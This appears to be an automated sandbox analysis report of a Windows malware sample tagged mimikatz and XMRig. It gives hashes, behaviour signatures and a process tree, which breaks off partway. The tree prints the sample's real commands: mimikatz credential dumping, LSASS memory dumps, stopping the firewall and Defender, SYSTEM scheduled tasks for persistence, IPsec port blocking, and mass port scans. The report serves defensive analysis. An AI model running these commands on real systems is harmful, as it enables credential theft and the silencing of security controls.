Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-11-2024 11:01

General

  • Target

    2024-11-12_b11317f541774bb044aadd2d90995670_hacktools_icedid_mimikatz.exe

  • Size

    8.3MB

  • MD5

    b11317f541774bb044aadd2d90995670

  • SHA1

    e8676722c9c4b41bb270ab7e6c721a4addef1727

  • SHA256

    308c19f28592b2e527ba15b30b4c923946fd67e56e6ca370be6707d271f50aee

  • SHA512

    81d1e786ec4c6b3d42fd34529157ef77aa845d908aa1bacaa7d7d5c19c4e1b97737e26eac22972cdf32ff0c1a7b62afbf97bf46d202f33f935c6e43ca8aaa2c7

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (29473) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2164
      • C:\Windows\TEMP\lntjubmbe\ttlnnh.exe
        "C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2520
    • C:\Users\Admin\AppData\Local\Temp\2024-11-12_b11317f541774bb044aadd2d90995670_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-12_b11317f541774bb044aadd2d90995670_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4020
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4508
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3488
        • C:\Windows\tllefmnq\yittybr.exe
          C:\Windows\tllefmnq\yittybr.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:208
    • C:\Windows\tllefmnq\yittybr.exe
      C:\Windows\tllefmnq\yittybr.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3060
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3880
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1364
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3080
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2496
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
              PID:2540
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3192
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2028
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:516
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2816
            • C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe
              C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:4712
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4828
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4348
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1032
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3412
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2756
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1848
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2088
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1592
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2352
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2336
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4644
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3488
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2448
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1444
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3976
            • C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe
              C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:3204
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt
            2⤵
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:548
            • C:\Windows\ppgkyibiq\Corporate\vfshost.exe
              C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
              3⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3140
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
            2⤵
              PID:3636
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4792
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
                3⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:4692
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4004
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1360
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
                3⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1712
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3972
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4828
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
                3⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3368
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:1572
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4020
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3468
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:1136
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:1132
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:1592
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3568
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2564
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2448
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2640
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:4660
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4324
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net stop SharedAccess
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1764
              • C:\Windows\SysWOW64\net.exe
                net stop SharedAccess
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3352
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop SharedAccess
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1780
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c netsh firewall set opmode mode=disable
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3648
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall set opmode mode=disable
                3⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:2608
            • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
              C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 788 C:\Windows\TEMP\ppgkyibiq\788.dmp
              2⤵
              • Executes dropped EXE
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:3308
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c netsh Advfirewall set allprofiles state off
              2⤵
                PID:4640
                • C:\Windows\SysWOW64\netsh.exe
                  netsh Advfirewall set allprofiles state off
                  3⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:884
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net stop MpsSvc
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3372
                • C:\Windows\SysWOW64\net.exe
                  net stop MpsSvc
                  3⤵
                    PID:2700
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MpsSvc
                      4⤵
                        PID:944
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3592
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2820
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop WinDefend
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3248
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop wuauserv
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4004
                    • C:\Windows\SysWOW64\net.exe
                      net stop wuauserv
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4504
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop wuauserv
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2724
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c sc config MpsSvc start= disabled
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3368
                    • C:\Windows\SysWOW64\sc.exe
                      sc config MpsSvc start= disabled
                      3⤵
                      • Launches sc.exe
                      PID:1772
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c sc config SharedAccess start= disabled
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3656
                    • C:\Windows\SysWOW64\sc.exe
                      sc config SharedAccess start= disabled
                      3⤵
                      • Launches sc.exe
                      • System Location Discovery: System Language Discovery
                      PID:3096
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c sc config WinDefend start= disabled
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2592
                    • C:\Windows\SysWOW64\sc.exe
                      sc config WinDefend start= disabled
                      3⤵
                      • Launches sc.exe
                      • System Location Discovery: System Language Discovery
                      PID:864
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c sc config wuauserv start= disabled
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3508
                    • C:\Windows\SysWOW64\sc.exe
                      sc config wuauserv start= disabled
                      3⤵
                      • Launches sc.exe
                      PID:8
                  • C:\Windows\TEMP\xohudmc.exe
                    C:\Windows\TEMP\xohudmc.exe
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of SetWindowsHookEx
                    PID:2712
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 332 C:\Windows\TEMP\ppgkyibiq\332.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2704
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2164 C:\Windows\TEMP\ppgkyibiq\2164.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3988
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2556 C:\Windows\TEMP\ppgkyibiq\2556.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1600
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2668 C:\Windows\TEMP\ppgkyibiq\2668.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2388
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2936 C:\Windows\TEMP\ppgkyibiq\2936.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2232
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3084 C:\Windows\TEMP\ppgkyibiq\3084.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:864
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3756 C:\Windows\TEMP\ppgkyibiq\3756.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2252
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3856 C:\Windows\TEMP\ppgkyibiq\3856.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2592
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3916 C:\Windows\TEMP\ppgkyibiq\3916.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3412
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4008 C:\Windows\TEMP\ppgkyibiq\4008.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:532
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2152 C:\Windows\TEMP\ppgkyibiq\2152.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3468
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2092 C:\Windows\TEMP\ppgkyibiq\2092.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1952
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2248 C:\Windows\TEMP\ppgkyibiq\2248.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5004
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 672 C:\Windows\TEMP\ppgkyibiq\672.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1600
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 972 C:\Windows\TEMP\ppgkyibiq\972.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2468
                  • C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
                    C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3156 C:\Windows\TEMP\ppgkyibiq\3156.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1596
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat
                    2⤵
                      PID:2700
                      • C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe
                        vmlbqggye.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                        3⤵
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        PID:3476
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                      2⤵
                        PID:4232
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                            PID:384
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4900
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2712
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1584
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4520
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                            3⤵
                              PID:1160
                        • C:\Windows\SysWOW64\ogiqci.exe
                          C:\Windows\SysWOW64\ogiqci.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4644
                        • C:\Windows\system32\cmd.EXE
                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
                          1⤵
                            PID:4504
                            • C:\Windows\ime\yittybr.exe
                              C:\Windows\ime\yittybr.exe
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:4852
                          • C:\Windows\system32\cmd.EXE
                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                            1⤵
                              PID:512
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                2⤵
                                  PID:4868
                                • C:\Windows\system32\cacls.exe
                                  cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                                  2⤵
                                    PID:2360
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                                  1⤵
                                    PID:4616
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      2⤵
                                        PID:2804
                                      • C:\Windows\system32\cacls.exe
                                        cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
                                        2⤵
                                          PID:3396
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
                                        1⤵
                                          PID:3316
                                          • C:\Windows\ime\yittybr.exe
                                            C:\Windows\ime\yittybr.exe
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:1948
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
                                          1⤵
                                            PID:592
                                            • C:\Windows\system32\cmd.exe
